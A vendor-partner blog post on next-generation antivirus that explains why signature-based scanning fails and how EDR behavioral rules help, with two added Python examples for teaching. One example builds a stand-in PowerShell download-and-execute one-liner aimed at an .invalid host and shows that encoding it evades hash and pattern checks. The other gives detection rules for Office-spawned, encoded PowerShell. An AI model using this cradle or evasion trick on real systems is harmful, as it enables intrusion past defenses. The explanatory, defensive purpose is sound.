This is the fourth installment in a 4-part blog series on cyber-security, courtesy of our partner Meriplex’s Director of Information Security, Andres Ruz.
Next-generation anti-virus (NGAV) protection is a broad term that refers to a new breed of security solutions designed to counter rapidly-evolving security threats. Functioning as a necessary supplement to the traditional methods used to protect enterprise IT, NGAV solutions offer the advanced detection and remediation capabilities enterprises now require.
The limits of traditional anti-virus solutions
Traditional anti-virus (AV) software focused largely on known threats, identified by indicators such as virus signatures, file hashes, IP addresses and URLs. To that end, these solutions relied on libraries of known malware characteristics. The AV software would scan files and systems, compare what it found against the library, and flag matches.
For this type of solution to work effectively, the libraries had to be continuously updated to reflect every new piece of malware as it appeared. In other words, the software could only detect what was already known to it. Unfortunately, many of today's cyber-threats cannot be detected this way, because by definition nothing about them is in any library yet.
Cyber-criminals today routinely rebuild or repack malware so that each sample carries a different hash and signature, and a growing share of attacks involve no malicious file at all. Zero-day attacks, which exploit vulnerabilities unknown to the vendor and to defenders, and malware-free attacks, which abuse legitimate tools already present on the endpoint and therefore give a signature-based scanner nothing to match, are rapidly increasing in frequency. In 2019, for example, the majority (51%) of cyber-attacks globally were malware-free. In 2018, that figure was just 40%. And if 51% doesn't sound too bad, consider this: in North America, 74% of cyber-attacks were malware-free.
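The following is an added example, not code from the original post or from Meriplex, that makes the limitation above concrete. It models the two kinds of library a traditional scanner keeps (exact file hashes and byte patterns), then shows how a trivially repacked variant slips past the hash check and how encoding the same payload slips past the pattern check as well. The "malicious" command line is a constructed stand-in pointing at a reserved .invalid domain, so it does nothing if run.

```python
import base64
import hashlib

# Constructed stand-in for a malicious one-liner (the URL uses a reserved .invalid
# domain, so it resolves nowhere). Not real malware; it only exercises the matching logic.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
KNOWN_BAD = ("powershell -nop -w hidden -c " + PAYLOAD).encode()


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Two kinds of "library" a traditional scanner keeps: exact file hashes, and byte
# patterns (the idea behind YARA-style content signatures).
HASH_DB = {sha256(KNOWN_BAD)}
PATTERN_DB = [b"DownloadString(", b"Net.WebClient"]


def hash_match(sample: bytes) -> bool:
    """Flag the sample only if its hash is already in the library."""
    return sha256(sample) in HASH_DB


def pattern_match(sample: bytes) -> bool:
    """Flag the sample if any known byte pattern appears in it."""
    return any(p in sample for p in PATTERN_DB)


def padded_variant(sample: bytes, seed: int) -> bytes:
    """Trivial polymorphism: append junk that changes the hash but not the behaviour."""
    return sample + b" # build-" + str(seed).encode()


def encoded_variant() -> bytes:
    """Same payload delivered via -EncodedCommand (base64 of UTF-16LE, the form
    PowerShell expects); the plaintext patterns no longer appear in the bytes."""
    enc = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
    return ("powershell -nop -w hidden -EncodedCommand " + enc).encode()


def evaluate() -> dict:
    """Run the original and two variants through both signature types."""
    variants = {
        "original": KNOWN_BAD,
        "padded": padded_variant(KNOWN_BAD, 7),
        "encoded": encoded_variant(),
    }
    return {name: {"hash": hash_match(v), "pattern": pattern_match(v)}
            for name, v in variants.items()}


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:9s} hash={result['hash']!s:6s} pattern={result['pattern']}")
```

Only the original sample is caught by its hash; the padded copy still trips the content pattern, but the encoded copy defeats both, and the library would need a fresh entry for it. Every further variant restarts that cycle, which is the update treadmill the text describes.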
It’s clear that a new approach is necessary.
The NGAV Difference
NGAV is more of a concept than a specific technology and has several competing definitions. Generally speaking, NGAV refers to modern antivirus software that goes beyond performing signature-based detection and utilizes advanced technologies – such as artificial intelligence (AI), machine learning, and analytics – to detect anomalous behavior in systems.
For our purposes, we’ll define NGAV solutions as those combining traditional endpoint protection platforms (EPP) and modern endpoint detection and response (EDR) technologies.
An EPP provides security to endpoints – workstations, laptops, servers, and users' mobile devices – by leveraging host firewalls, port and device controls, and malware detection. Since over 80% of cyber-attacks focus on endpoints, EPPs remain important: they effectively stop malware whose signatures are already known. Nevertheless, on their own they are no longer enough.
Endpoint detection and response (EDR) systems continuously record and analyze endpoint activity – process creation, command lines, file and registry changes, network connections – enabling rapid responses to issues like zero-day and malware-free attacks, employee errors, advanced persistent threats (APT) and ransomware. The key is this: advanced cyber-threats that have slipped past the front-line defenses of your EPP still have to do something on the endpoint, and that activity creates anomalies in your systems that EDR solutions can detect.
Analyzing vast amounts of real-time endpoint data and leveraging AI, machine learning, and advanced analytics enables EDR systems to flag abnormal behavior in your systems that indicates a possible security breach, even when every file involved is a legitimate, signed binary. Working in concert, EPP and EDR deliver a combined prevention, detection and response capability for rapid analysis and remediation of security issues across the network.
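To show what "detecting anomalies in behavior" means in practice, here is an added example (not code from the original post or from any vendor's product) that runs two simple behavioral rules over constructed process-creation telemetry of the kind an EDR sensor collects. The field names, the event log lines and the scoring weights are all assumptions made for the example. Every binary in the log is a legitimate Windows or Office executable, so a hash library has nothing to match; the detection comes entirely from who launched what, and how.

```python
import json
import re
from collections import defaultdict

# Constructed process-creation telemetry (JSON lines), loosely modelled on the
# fields an EDR sensor records. The field names are assumptions for this example.
SAMPLE_EVENTS = r"""
{"ts": 1, "pid": 100, "ppid": 1,   "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe", "user": "alice"}
{"ts": 2, "pid": 200, "ppid": 100, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmd": "WINWORD.EXE /n invoice.docm", "user": "alice"}
{"ts": 3, "pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAKAAuAC4ALgApAA==", "user": "alice"}
{"ts": 4, "pid": 400, "ppid": 100, "image": "C:\\Windows\\System32\\notepad.exe", "cmd": "notepad.exe notes.txt", "user": "alice"}
{"ts": 5, "pid": 500, "ppid": 1,   "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1", "user": "SYSTEM"}
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts abbreviated switches, so match the common spellings of -EncodedCommand
# and -WindowStyle Hidden. Case-insensitive; the leading whitespace avoids matching inside words.
ENCODED_FLAG = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\b")
HIDDEN_WINDOW = re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: list, threshold: int = 50) -> list:
    """Score each process by the behaviours it exhibits; return those at or above threshold."""
    by_pid = {e["pid"]: e for e in events}
    findings = defaultdict(list)  # pid -> [(score, reason), ...]
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        # Rule 1: an Office application spawning a scripting host or shell is the
        # classic malware-free initial-access chain (macro -> PowerShell).
        if parent_name in OFFICE_APPS and child in SHELLS:
            findings[e["pid"]].append((60, f"{parent_name} spawned {child}"))
        # Rule 2: PowerShell launched with an encoded command and/or a hidden window.
        if child in {"powershell.exe", "pwsh.exe"}:
            if ENCODED_FLAG.search(e["cmd"]):
                findings[e["pid"]].append((20, "encoded command line"))
            if HIDDEN_WINDOW.search(e["cmd"]):
                findings[e["pid"]].append((10, "hidden window"))
    alerts = []
    for pid, hits in findings.items():
        score = sum(s for s, _ in hits)
        if score >= threshold:
            e = by_pid[pid]
            alerts.append({"pid": pid, "user": e["user"], "score": score,
                           "reasons": [r for _, r in hits], "cmd": e["cmd"]})
    return sorted(alerts, key=lambda a: -a["score"])


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print(f"pid={a['pid']} user={a['user']} score={a['score']} reasons={a['reasons']}")
```

The scheduled backup script (pid 500) also runs PowerShell, but from a service context with a plain -File argument, so it accumulates no score; the Word-spawned, hidden, encoded PowerShell (pid 300) is flagged on three independent behaviors. Weighting and combining several weak signals per process, rather than alerting on any one of them, is what keeps this kind of rule usable at scale.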
Combining EPP and EDR for your NGAV
To get the most out of your organization's NGAV, it is critical to evaluate how well the EPP and EDR solutions you choose integrate and operate together: whether they share one agent, one console and one data model, and whether a detection in one can trigger containment in the other. The simplest way to achieve that is to use the same provider for both, though no combination guarantees protection on its own; the integration still has to be tested end to end.
Meriplex leverages an advanced endpoint protection platform to provide best-in-class NGAV to our clients. Using this platform creates a consistent ecosystem that allows cross-linking of all relevant assets and synchronized remediation of incidents and vulnerabilities. The maturity of these solutions allows for an incremental adoption approach based on an individual organization’s needs.
As today’s threats become increasingly complex and dangerous, the tools and methodologies used to combat them call for more advanced technologies, such as AI, machine learning, and advanced analytics. Located at the edge – the periphery of the network – Netrality’s interconnected data centers provide the speed, bandwidth, and processing power NGAV and other next-gen security technologies demand. Contact us for more information.